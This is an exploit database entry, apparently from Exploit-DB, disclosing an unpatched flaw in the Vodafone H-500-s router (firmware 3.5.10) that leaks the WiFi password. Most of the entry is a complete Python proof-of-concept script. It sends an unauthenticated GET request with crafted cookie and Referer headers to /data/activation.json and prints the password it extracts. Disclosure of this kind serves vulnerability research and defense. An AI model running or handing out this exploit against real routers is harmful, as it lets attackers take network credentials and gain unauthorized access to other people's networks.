Vodafone H-500-s 3.5.10 - WiFi Password Disclosure

vendor:

H-500-s

by:

Daniel Monzón (stark0de)

7.5

CVSS

HIGH

WiFi Password Disclosure

200

CWE

Product Name: H-500-s

Affected Version From: Vodafone-H-500-s-v3.5.10

Affected Version To: Vodafone-H-500-s-v3.5.10

Patch Exists: NO

Related CWE:

CPE: h:vodafone:h-500-s

Metasploit:

Other Scripts:

Platforms Tested:

2022

Vodafone H-500-s 3.5.10 – WiFi Password Disclosure

The WiFi access point password gets disclosed just by performing a GET request with certain headers

Mitigation:

Ensure that the GET request is not allowed to be performed by an unauthorized user

Source

Exploit-DB raw data:

# Exploit Title: Vodafone H-500-s 3.5.10 - WiFi Password Disclosure
# Date: 01/01/2022
# Exploit Author: Daniel Monzón (stark0de)
# Vendor Homepage: https://www.vodafone.es/
# Software Link: N/A
# Version: Firmware version Vodafone-H-500-s-v3.5.10
# Hardware model: Sercomm VFH500

# The WiFi access point password gets disclosed just by performing a GET request with certain headers

import requests
import sys
import json
if len(sys.argv) != 2:
print("Usage: python3 vodafone-pass-disclose.py http://IP")
sys.exit()
url = sys.argv[1]+"/data/activation.json"
cookies = {"pageid": "129"}
headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101

Firefox/78.0", "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-
Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested-
With": "XMLHttpRequest", "Connection": "close", "Referer":"http://192.168.0.1/activation.html?mode=basic&lang=en-es&step=129"}

req=requests.get(url, headers=headers, cookies=cookies)
result=json.loads(req.text)[3].get("wifi_password")
print("[+] The wifi password is: "+result)